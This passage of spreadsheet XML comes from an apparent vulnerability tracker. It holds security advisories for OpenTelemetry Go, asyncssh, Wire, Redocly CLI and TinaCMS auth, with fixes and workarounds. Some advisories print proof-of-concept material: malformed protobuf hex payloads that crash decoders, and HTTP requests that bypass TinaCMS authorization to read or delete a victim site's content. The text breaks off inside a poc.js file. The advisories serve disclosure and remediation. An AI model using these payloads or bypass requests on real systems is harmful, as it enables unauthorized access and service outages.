          <t>go:go.opentelemetry.io/otel/exporters/otlp/otlptrace, go:go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc, go:go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp, go:go.opentelemetry.io/otel/exporters/zipkin, go:go.opentelemetry.io/otel/sdk</t>
        </is>
      </c>
      <c r="M75" s="5" t="inlineStr">
        <is>
          <t>1.45.0</t>
        </is>
      </c>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr"/>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-532</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>### Summary
OpenTelemetry Go versions 1.5.0 through 1.44.0 can include trace exporter endpoint configuration in an internal diagnostic log emitted when an SDK `TracerProvider` is created. The default OpenTelemetry logger does not emit this event. Exposure requires an application to install a logger that enables OpenTelemetry's internal Info-level diagnostics and for someone other than the intended audience to have access to those logs.
The logged configuration can disclose the address of the trace collector and whether the OTLP/HTTP connection is configured as insecure. The Zipkin exporter logs its complete collector URL, so credentials in URL userinfo or tokens in the query string are also disclosed if an application embeds them there. OTLP authentication headers, TLS key material, and exported span data are not included in this log.
Exporter `MarshalLog` implementations that caused this configuration to be included in internal logs were introduced by [`a1fff3c`](https://github.com/open-telemetry/opentelemetry-go/commit/a1fff3c2588c783d1f3f6fd2315aa2660fc6d330).
### Details
When `sdk/trace.NewTracerProvider` constructs a provider, it records a `TracerProvider created` internal Info event containing the provider configuration. In affected versions, the configuration's `MarshalLog` methods recursively include:
1. the provider's span processors;
2. each processor's span exporter; and
3. for the OTLP trace exporter, its client configuration.
This causes the following values to be present in the event:
- OTLP trace gRPC: the configured endpoint;
- OTLP trace HTTP: the configured endpoint and the `Insecure` flag; and
- Zipkin: the complete collector URL.
OpenTelemetry Go does not emit this event with its default logger, which only emits errors. An application must explicitly configure a sufficiently verbose logger with `otel.SetLogger`. The required `logr` verbosity is version-dependent:
- versions 1.5.0 through 1.14.x use `V(1)` for this Info event; and
- versions 1.15.0 through 1.44.0 use `V(4)`.
OTLP header configuration is not part of the marshaled object, so credentials supplied with `WithHeaders` or the corresponding environment variables are not exposed. The documented OTLP `WithEndpoint` input is a collector address rather than a credential-bearing URL. The higher-risk case is therefore the Zipkin collector URL, which is retained and logged in full, or an application passing sensitive data in an OTLP endpoint outside the documented format.
### Proof of concept
The following program demonstrates the behavior with OpenTelemetry Go 1.44.0. It deliberately places credentials and a token in the Zipkin collector URL and enables internal Info logging:
```go
package main
import (
	"bytes"
	"context"
	"fmt"
	"github.com/go-logr/logr/funcr"
	"go.opentelemetry.io/otel"
	"go.opentelemetry.io/otel/exporters/zipkin"
	sdktrace "go.opentelemetry.io/otel/sdk/trace"
)
func main() {
	var logs bytes.Buffer
	otel.SetLogger(funcr.New(func(_, args string) {
		_, _ = logs.WriteString(args)
	}, funcr.Options{Verbosity: 4}))
	exporter, err := zipkin.New(
		"http://user:pass@zipkin.internal:9411/api/v2/spans?token=secret",
	)
	if err != nil {
		panic(err)
	}
	tp := sdktrace.NewTracerProvider(sdktrace.WithBatcher(exporter))
	_ = tp.Shutdown(context.Background())
	fmt.Println(logs.String())
}
```
The `TracerProvider created` event contains:
```text
http://user:pass@zipkin.internal:9411/api/v2/spans?token=secret
```
For versions before 1.15.0, set `funcr.Options{Verbosity: 1}` instead.
### Impact
This is a conditional disclosure through application logs. Affected applications must enable verbose OpenTelemetry internal diagnostics and configure a trace exporter containing information they do not intend to expose to readers of those logs. In that configuration, a person or system with log access can learn the trace collector address and internal network topology. If credentials or tokens are embedded directly in a Zipkin collector URL, those values can also be recovered from the logs.
There is no exposure with the default OpenTelemetry logger, and the vulnerable log is generated from local application configuration rather than remotely supplied span data. OTLP authentication headers, certificate or private-key contents, and telemetry payloads are not logged by this path.
### Remediation
Upgrade the affected OpenTelemetry Go modules to version 1.45.0 or later. The fix in [`3a1412d`](https://github.com/open-telemetry/opentelemetry-go/commit/3a1412d2b3bc4e4231fbeac2ed42117ae541bb38) stops recursively marshaling exporter and client configuration and records their types instead.
If an immediate upgrade is not possible:
- keep OpenTelemetry internal logging below the Info verbosity described above;
- do not embed credentials or tokens in exporter endpoint URLs; use authentication headers or another supported credential mechanism; and
- restrict access to existing logs and rotate any credentials that may already have been recorded.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81870</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62949</t>
        </is>
      </c>
      <c r="D76" s="5" t="inlineStr"/>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr">
        <is>
          <t>pip:asyncssh</t>
        </is>
      </c>
      <c r="M76" s="5" t="inlineStr">
        <is>
          <t>2.24.0</t>
        </is>
      </c>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr"/>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>## Summary
A malicious SSH server can wedge an AsyncSSH **client**, and an authenticated
client can wedge an AsyncSSH **server**, by sending a channel `maximum packet
size` of `0` in `SSH_MSG_CHANNEL_OPEN_CONFIRMATION` (server→client) or
`SSH_MSG_CHANNEL_OPEN` (client→server). AsyncSSH stores the peer-supplied value
verbatim with no lower-bound check; the first time channel data is written,
`SSHChannel._flush_send_buf` enters a **synchronous infinite loop** that cannot
be interrupted by `asyncio.wait_for` or any timeout. The loop body has no
`await`, so it blocks the entire asyncio event loop — for a server, one
malicious authenticated channel freezes **all** current and future connections.
RFC 4254 §5.1 leaves receiver behavior for a peer-reported "maximum packet
size = 0" undefined, so the value must be rejected rather than stored.
## Root cause
`asyncssh/channel.py`:
```python
# process_open (server side)        -- line 465
self._send_pktsize = send_pktsize    # peer value, no &gt;= 1 check
# process_open_confirmation (client) -- line 528
self._send_pktsize = send_pktsize    # peer value, no &gt;= 1 check
# _flush_send_buf                    -- lines 305-320
while self._send_buf and self._send_window:
    pktsize = min(self._send_window, self._send_pktsize)  # 0 when peer sends 0
    buf, datatype = self._send_buf[0]
    if len(buf) &gt; pktsize:          # True for any buffered data
        data = buf[:pktsize]        # empty (b'')
        del buf[:pktsize]           # no-op
    ...
    self._send_window -= len(data)  # -= 0, unchanged
```
With `_send_pktsize == 0`, `pktsize` is `0`, so `buf[:0]` is empty,
`del buf[:0]` is a no-op, and `_send_window` is never decremented — the
`while` condition is permanently true, and with no `await` in the body the
event loop is blocked.
## Impact
- **Client vector (primary):** a malicious SSH server replies to the client's
  channel open with `maximum packet size = 0`; the client wedges on its first
  channel write. The attacker is the server, so it needs no valid credentials.
- **Server vector:** an authenticated client opens a channel with
  `maximum packet size = 0`; any server-side channel write wedges the AsyncSSH
  server's event loop, freezing **every** current and future connection. A
  single low-privilege account can take the whole server down.
Both vectors are a single SSH message, deterministic, and cause total
availability loss for the affected process.
## Affected versions
&lt;= 2.23.1 (latest release, 2026-06-06); also present on `master`
(channel.py:465/528 unguarded). Verified end-to-end on 2.23.1.
## Verification
The maintainer's proposed fix (reject `send_pktsize == 0` in `connection.py`
`_process_channel_open` / `_process_channel_open_confirmation`) was applied to
2.23.1 and re-tested end-to-end over TCP:
- **Unpatched:** malicious server (paramiko forcing `max_packet_size=0` in
  OPEN_CONFIRMATION) + real asyncssh client → client event loop wedges.
- **Patched:** the guard fires inside `_process_channel_open_confirmation`, the
  malicious value is rejected, the connection closes cleanly
  (`ChannelOpenError: SSH connection closed`), and the client does **not** wedge.
The maintainer (Ron Frederick) independently confirmed the freeze and noted that
**even shutting the server down does not break clients out of the loop**.
Reproducers available: a focused harness driving the real
`SSHChannel._flush_send_buf` with `_send_pktsize=0`, and an end-to-end
`malicious_server.py` (paramiko) + `client.py` (real asyncssh) pair. The
end-to-end client repro uses `asyncio.new_event_loop()` (not `get_event_loop()`)
for Python 3.14 compatibility.
## Suggested fix (maintainer's approach)
In `connection.py`, after each `send_pktsize = packet.get_uint32()` in
`_process_channel_open` and `_process_channel_open_confirmation`:
```python
if send_pktsize == 0:
    raise ProtocolError('Invalid maximum packet size')
```
## CVSS
`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (6.5 Medium). An earlier draft
quoted 7.5 High ("100% CPU"); the synchronous loop burns ~100% of one core's
worth of CPU but, being single-threaded, the OS scheduler spreads it across
cores, so the real impact is event-loop / connection freeze, not machine-wide
CPU exhaustion.
## References
- RFC 4254 §5.1 (channel "maximum packet size"; behavior for 0 is undefined).
- The same `maximum packet size = 0` send-loop wedge was confirmed in several
  other independent SSH implementations (different languages/runtimes) and
  reported to each maintainer separately.
## Credits
Reported by zhangph (afldl), 2026-06-20.
```</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62949</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63126</t>
        </is>
      </c>
      <c r="D77" s="5" t="inlineStr"/>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>maven:com.squareup.wire:wire-runtime</t>
        </is>
      </c>
      <c r="M77" s="5" t="inlineStr">
        <is>
          <t>6.4.5, 7.0.0-alpha04</t>
        </is>
      </c>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr"/>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Wire's protobuf decoders did not consistently validate attacker-controlled length-delimited sizes against the current reader bounds before computing cursor, limit, or pointer positions.
In the Kotlin runtime, `ProtoAdapter.decode(ByteArray)` and `ProtoAdapter.decode(ByteString)` use the `ProtoReader32` fast path implemented by `ByteArrayProtoReader32`. In `ByteArrayProtoReader32.internalNextLengthDelimited()`, Wire read an untrusted varint length into an `Int` and rejected only negative values. A length such as `2147483647` is non-negative, so it passed that check, but `pos + length` overflowed the signed 32-bit cursor and produced a negative `limit`. The following `if (limit &gt; pushedLimit)` guard did not catch this because the overflowed value was negative.
That invalid limit then reached string, bytes, skip, and scalar-reading paths as an invalid byte count or invalid range. Instead of failing as a checked decode error such as `IOException`, malformed input could throw unchecked runtime exceptions including `IllegalArgumentException` and `ArrayIndexOutOfBoundsException`. Applications commonly treat malformed protobuf input as an expected decode failure; unchecked runtime exceptions escaping that boundary can crash request handling or the process.
The original report is a sibling of the negative-length skipped-group bug fixed as CVE-2026-45799. It is not the same bug. The length in this advisory is positive, and the overflow occurs when setting a length-delimited message limit, not only when skipping a group.
While auditing for the same bug class, related boundary flaws were also found and fixed:
- Kotlin `ProtoReader` now validates logical message limits before varint, fixed32, fixed64, and skip operations. The originally reported byte-array overflow payload did not reproduce as the same signed overflow in `ProtoReader`, because that reader tracks positions as `Long`, but the streaming reader still needed consistent current-message-limit enforcement.
- Swift `ReadBuffer.readVarint()` read `pointer.pointee` before checking that one byte remained. A tag-only varint field could read past the end of the buffer.
- Swift `ReadBuffer.verifyAdditional(count:)` formed `pointer.advanced(by: count)` before proving the requested `count` fit within the remaining buffer, so pointer arithmetic ran before the bounds were established. (The distinct Swift negative-length `skipGroup()` crash is tracked separately as GHSA-86wm-r4c5-2rc9 / CVE-2026-61695; this advisory covers the positive/oversized-length boundary failures.)
- Swift nested-message decoding and packed-repeated decoding computed end pointers from untrusted lengths before validating that the bytes were present.
- Swift packed-repeated decoding reserved array capacity from an untrusted length before validating that the length existed in the current buffer.
- Swift size-delimited decoding converted an untrusted `UInt64` varint size to `Int` without exactness or availability checks. On platforms where the value is not representable, this could trap.
The fix enforces a single invariant across the hardened readers: every decoded or skipped byte count must be non-negative and no larger than the remaining bytes in the current logical message limit before any cursor, pointer, limit, allocation, or slice is advanced.
### Impact
An attacker who can supply protobuf bytes to an application using affected Wire decoders can trigger a denial of service by causing decode to fail with unchecked runtime failures or traps rather than normal malformed-input decode errors.
Known impact:
- Availability impact only.
- No known confidentiality impact.
- No known integrity impact.
- No known code execution.
Attack requirements:
- The application decodes attacker-controlled protobuf bytes with Wire.
- No authentication is required if the decoding endpoint is reachable without authentication.
- A single short malformed protobuf payload is sufficient for the Kotlin byte-array fast path.
Most directly affected Kotlin entry points:
- `ProtoAdapter.decode(ByteArray)`
- `ProtoAdapter.decode(ByteString)`
Adjacent Kotlin path hardened by this fix:
- `ProtoAdapter.decode(BufferedSource)`
- direct use of `ProtoReader`
Affected Swift entry points:
- Swift `ProtoDecoder` and `ProtoReader` APIs when decoding attacker-controlled `Data` or buffers.
### Proof of concept and regression payloads
These payloads are intentionally small and should be treated as malformed protobuf input. After the fix, they must fail with normal decode errors such as `IOException`, `EOFException`, or `ProtoDecoder.Error.unexpectedEndOfData`, not unchecked runtime exceptions, traps, out-of-bounds reads, or large allocations.
#### Kotlin byte-array known length-delimited field
Hex:
```text
0A FF FF FF FF 07
```
Meaning:
- `0A`: field 1, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix behavior observed through `Person.ADAPTER.decode(byteArray)`:
```text
java.lang.IllegalArgumentException: startIndex: 6 &gt; endIndex: -2147483643
```
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin byte-array unknown length-delimited field
Hex:
```text
1A FF FF FF FF 07
```
Meaning:
- `1A`: field 3, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix behavior observed:
```text
ArrayIndexOutOfBoundsException
```
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin byte-array skipped group containing oversized positive length
Hex:
```text
0B 0A FF FF FF FF 07 0C
```
Meaning:
- `0B`: start group, field 1
- `0A`: nested field 1, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
- `0C`: end group, field 1
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin current-message-limit fixed32 boundary
Hex:
```text
02 0D 05 00 00 00
```
Meaning:
- `02`: outer length-delimited message length is 2 bytes
- `0D`: nested field 1, fixed32
- `05 00 00 00`: enough bytes remain in the underlying source, but not inside the current logical message limit
Expected fixed behavior:
```text
EOFException
```
This covers the invariant that scalar reads must not cross the current length-delimited message boundary even when the underlying source has more bytes available.
#### Swift tag-only varint value
Hex:
```text
08
```
Meaning:
- `08`: field 1, varint
- Missing varint value byte
Pre-fix risk:
- `ReadBuffer.readVarint()` could dereference `pointer.pointee` before verifying that a byte remained.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift nested message with oversized positive length
Hex:
```text
12 FF FF FF FF 07
```
Meaning:
- `12`: field 2, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix risk:
- Nested message decoding computed an end pointer from an untrusted length before proving that the buffer contained that many bytes.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift packed repeated field with oversized positive length
Hex:
```text
0A FF FF FF FF 07
```
Meaning:
- `0A`: field 1, length-delimited packed repeated field
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix risk:
- Packed repeated decoding could reserve capacity based on an untrusted length before proving the bytes were present.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift size-delimited stream with unrepresentable size
Hex:
```text
FF FF FF FF FF FF FF FF FF 01
```
Meaning:
- Size-delimited message length varint `UInt64.max`
Pre-fix risk:
- `ProtoDecoder.decodeSizeDelimited(_:from:)` converted the untrusted `UInt64` to `Int` without exactness checking.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
### Root cause
The vulnerable code mixed three operations that must remain separate:
1. Decode an untrusted protobuf length.
2. Validate that the length is non-negative and fits within the current logical message boundary.
3. Advance the cursor, pointer, limit, slice, or allocation based on that length.
In the vulnerable paths, step 3 happened before step 2 was complete. For Kotlin `ByteArrayProtoReader32`, this caused signed integer wraparound in `pos + length`. For Swift, related pointer and allocation operations could be performed before proving the requested bytes existed.
### Fix
The fix centralizes checked cursor and pointer advancement.
Kotlin changes:
- `ByteArrayProtoReader32` now validates constructor invariants for `pos` and `limit`.
- `ByteArrayProtoReader32` now uses shared helpers to:
  - reject negative lengths,
  - compute checked limits,
  - compute remaining bytes in the current logical limit,
  - validate before `skip`,
  - validate before string and bytes reads,
  - validate before fixed32 and fixed64 reads.
- `ProtoReader` now mirrors the same logical-boundary model for:
  - length-delimited limit calculation,
  - skipped length-delimited fields,
  - varint reads,
  - fixed32 reads,
  - fixed64 reads,
  - current-message remaining-byte calculations.
Swift changes:
- `ReadBuffer` now computes checked end pointers only after confirming `count &gt;= 0` and `count &lt;= remaining`.
- `ReadBuffer.readVarint()` verifies one byte remains before each byte dereference.
- `ReadBuffer.readBuffer(count:)`, `readData(count:)`, `readFixed32()`, and `readFixed64()` compute the checked new pointer before reading and advancing.
- `ProtoReader.beginMessage()` validates nested message lengths before storing a message-end pointer.
- Packed repeated decoding validates the packed field length before preallocation and before constructing the loop boundary.
- `ProtoDecoder.decodeSizeDelimited(_:from:)` converts sizes with `Int(exactly:)` and verifies that the full message bytes exist before constructing a child buffer.
Fixed in PR #3635:
- https://github.com/square/wire/pull/3635
- Fix commit `25ebcabb9ab7f12d1d77af75ecbc51726fddc015`
### Workarounds
The recommended remediation is to upgrade to a patched release.
Partial mitigations if an immediate upgrade is not possible:
- Reject or cap untrusted protobuf message sizes before passing bytes to Wire.
- Prefer decoding from a bounded source where possible rather than decoding unbounded attacker-controlled byte arrays.
- Treat unchecked runtime exceptions from protobuf decode as malformed-input failures at service trust boundaries so they cannot crash the process.
- For Swift, do not pass untrusted size-delimited streams or `Data` directly to affected decoders without an outer size cap and exception/error boundary.
These mitigations reduce exposure but do not fully fix the parser bugs.
### Detection
A crash or error may contain one of the following symptoms when processing malformed protobuf bytes:
```text
IllegalArgumentException: startIndex: 6 &gt; endIndex: -2147483643
ArrayIndexOutOfBoundsException
IndexOutOfBoundsException
unexpected unchecked RuntimeException during ProtoAdapter.decode(ByteArray)
Swift trap during Int conversion from an untrusted protobuf size
Swift unexpected pointer/buffer failure while reading malformed varints or length-delimited values
```
The absence of these exact messages does not prove safety. Any unchecked exception, trap, or process crash while decoding malformed length-delimited protobuf input should be investigated.
### Verification
Regression tests added:
- `ProtoReader32Test.lengthDelimitedRejectsPositiveLengthOverflow`
- `ProtoReader32Test.fixed32CannotReadPastLengthDelimitedLimit`
- `ProtoReaderTest.fixed32CannotReadPastLengthDelimitedLimit`
- `ProtoReaderTests.testReadVarintRejectsMissingValue`
- `ProtoReaderTests.testNestedMessageRejectsOversizedLength`
- `ProtoReaderTests.testPackedRepeatedRejectsOversizedLengthBeforePreallocation`
- `ProtoDecoderTests.testDecodeSizeDelimitedRejectsUnrepresentableSize`
Focused verification command:
```bash
./gradlew :wire-runtime:jvmTest :wire-runtime-swift:test
```
Expected result:
```text
BUILD SUCCESSFUL
```
### Relationship to related advisories
This is a distinct vulnerability from the negative-length issues. It is a
different bug class — a positive, non-negative length (for example
`2147483647`) that passes the existing `length &lt; 0` check but still overflows
the signed 32-bit cursor or crosses the current message boundary — and it has
a separate fix (PR #3635, not the negative-length PRs).
- `CVE-2026-45799` / `GHSA-7xpr-hc2w-34m9` fixed the original Kotlin/JVM
  negative-length skipped-group crash (Wire `6.3.0`). The non-negative
  overflow described here was not covered by that check and remained
  exploitable through `6.4.4`.
- `GHSA-86wm-r4c5-2rc9` / `CVE-2026-61695` covers the Swift negative-length
  `skipGroup()` crash (PR #3616). The Swift hardening in this advisory
  (PR #3635) instead addresses positive/oversized-length overflow, buffer
  over-read, and unrepresentable-size conversions in the Swift readers.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63126</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63225</t>
        </is>
      </c>
      <c r="D78" s="5" t="inlineStr"/>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr"/>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr">
        <is>
          <t>npm:@redocly/cli</t>
        </is>
      </c>
      <c r="M78" s="5" t="inlineStr">
        <is>
          <t>1.34.17, 2.33.2</t>
        </is>
      </c>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr"/>
      <c r="P78" s="5" t="inlineStr"/>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>### Impact
An OpenAPI or AsyncAPI description could make the `split` command write
files outside the chosen output directory, on the machine of anyone who runs
`split` against it. The write is constrained rather than a free file-write
primitive: component data is emitted only as YAML/JSON, and code-sample files are
named after the HTTP method, so an attacker can place or overwrite files at an
unintended path but has limited control over their name and contents.
### Patches
Fixed in `@redocly/cli` v2.33.2.
### Workarounds
Do not run the `split` command on API descriptions from untrusted or unreviewed sources.
To detect an exploit attempt, inspect the description's component names and
`x-codeSamples` `lang` values for a literal `../` — neither legitimately contains
path segments.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63225</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63506</t>
        </is>
      </c>
      <c r="D79" s="5" t="inlineStr"/>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr">
        <is>
          <t>npm:@tinacms/auth, npm:next-tinacms-azure</t>
        </is>
      </c>
      <c r="M79" s="5" t="inlineStr">
        <is>
          <t>1.1.4, 15.0.1</t>
        </is>
      </c>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr"/>
      <c r="P79" s="5" t="inlineStr"/>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>## Summary
`@tinacms/auth`'s `isAuthorized(req)` decides authorization by validating the caller's bearer token against `https://identity.tinajs.io/v2/apps/${req.query.clientID}/currentUser`, where the `clientID` comes from the request and is never compared to the site's own configured TinaCloud app id. The function answers "is this token a verified user of whatever app the caller named?" instead of "is this token a verified user of THIS site?"
Any TinaCloud user can create their own free app, get a valid token for it, and send `?clientID=&lt;their-own-app&gt;` plus `Authorization: &lt;their-own-token&gt;` to a victim self-hosted site. The victim's `authorized` callback runs `const user = await isAuthorized(req); return user &amp;&amp; user.verified`, which returns `true`, and the victim authorizes the attacker.
The attacker holds no account on the victim and needs no victim interaction. With the media handlers this grants read, upload, and delete on the victim's media bucket. When the backend uses `TinaCloudBackendAuthProvider()` (the default the `tinacms init` wizard generates for TinaCloud auth), it grants full GraphQL read, write, and delete of the victim's content.
## Affected code (confirmed at `5a6839f`)
`packages/@tinacms/auth/src/index.ts:71-88` reads the `clientID` from the request:
```ts
export const isAuthorized = async (req: NextApiRequest) =&gt; {
  const clientID = req.query.clientID;     // attacker-controlled
  const token = req.headers.authorization; // attacker-controlled
  if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
    return await isUserAuthorized({ clientID, token });
  }
  return undefined;
};
```
`index.ts:16-43` sends that caller-chosen `clientID` straight to the identity server, and returns the user on `200`:
```ts
const tinaCloudRes = await fetch(
  `https://identity.tinajs.io/v2/apps/${clientID}/currentUser`,
  { headers: new Headers({ 'Content-Type': 'application/json', authorization: token }), method: 'GET' }
);
if (tinaCloudRes.ok) { return await tinaCloudRes.json(); }
```
`index.ts:118-135` (`TinaCloudBackendAuthProvider`) gates only on `verified`, which reflects the attacker's own email verification:
```ts
isAuthorized: async (req, _res) =&gt; {
  const user = await isAuthorized(req as NextApiRequest);
  if (user &amp;&amp; user.verified) return { isAuthorized: true };
  return { isAuthorized: false, errorCode: 401, errorMessage: 'Unauthorized' };
},
```
Every media-store README wires the same gate (`next-tinacms-cloudinary/README.md:113-122`, identical in `s3` and `dos`):
```ts
authorized: async (req, _res) =&gt; {
  if (process.env.NEXT_PUBLIC_USE_LOCAL_CLIENT === '1') return true;
  const user = await isAuthorized(req);
  return user &amp;&amp; user.verified;   // no clientID === &lt;this site's app&gt; check
}
```
The bug is duplicated in `next-tinacms-azure/src/auth.ts:34-51` (`req.nextUrl.searchParams.get('clientID')`). Downstream nothing pins the site's `clientID`: `@tinacms/datalayer/src/backend/index.ts:201` gates on the boolean, and `next-tinacms-cloudinary/src/handlers.ts:36` returns 401 only when the callback is false. The `tinacms init` TinaCloud path ships this by default (`@tinacms/cli/.../prompts/authProvider.ts:17` -&gt; `TinaCloudBackendAuthProvider()`, used in `templates/tinaNextRoute.tsx:21-24` for every non-local deployment).
## Steps to reproduce (real target)
**Setup:** attacker has one free TinaCloud account with one app (`clientID = ATTACKER_APP`, token `T_attacker`) and no victim account. Victim is any self-hosted TinaCMS site using `@tinacms/auth`.
Media bucket (read; the same gate covers `POST` upload and `DELETE`):
```
GET /api/cloudinary/media?clientID=ATTACKER_APP HTTP/1.1
Host: victim.example
Authorization: T_attacker
```
Content backend, when `TinaCloudBackendAuthProvider` is used:
```
POST /api/tina/gql?clientID=ATTACKER_APP HTTP/1.1
Host: victim.example
Authorization: T_attacker
Content-Type: application/json
{"query":"mutation($c:String!,$r:String!){deleteDocument(collection:$c,relativePath:$r){__typename}}","variables":{"c":"post","r":"hello.md"}}
```
**Expected:** 401/403 for a user with no access to `victim.example`.
**Actual:** 200, because authorization is bound to the attacker-supplied `clientID`.
## Proof of concept (self-contained, zero dependencies)
Save the file below as `poc.js` and run `node poc.js` (Node &gt;= 18). It runs the package's own `isAuthorized` / `isUserAuthorized` (TypeScript types removed; the hard-coded `identity.tinajs.io` base read from an env var so it points at a local identity model) behind the verbatim media-store `authorized` callback. The identity model scopes tokens to apps correctly and is not itself vulnerable; the bug is that the victim lets the caller choose which app to validate against.
```js
/**
 * Self-contained PoC — @tinacms/auth cross-tenant authorization bypass
 * Audited commit: 5a6839f95ca60d1b9f4032a3bed1ae4a338a4787 (@tinacms/auth 1.1.3)
 *
 * Zero dependencies. Run with:  node poc.js   (Node &gt;= 18 for global fetch)
 *
 * The two functions below are copied from packages/@tinacms/auth/src/index.ts.
 * The ONLY changes are: TypeScript types removed, and the hard-coded
 * https://identity.tinajs.io base read from IDENTITY_BASE so it can point at the
 * local identity model. req.query.clientID, the currentUser call, and the
 * `user &amp;&amp; user.verified` gate are byte-for-byte the original logic.
 */
const http = require('http');
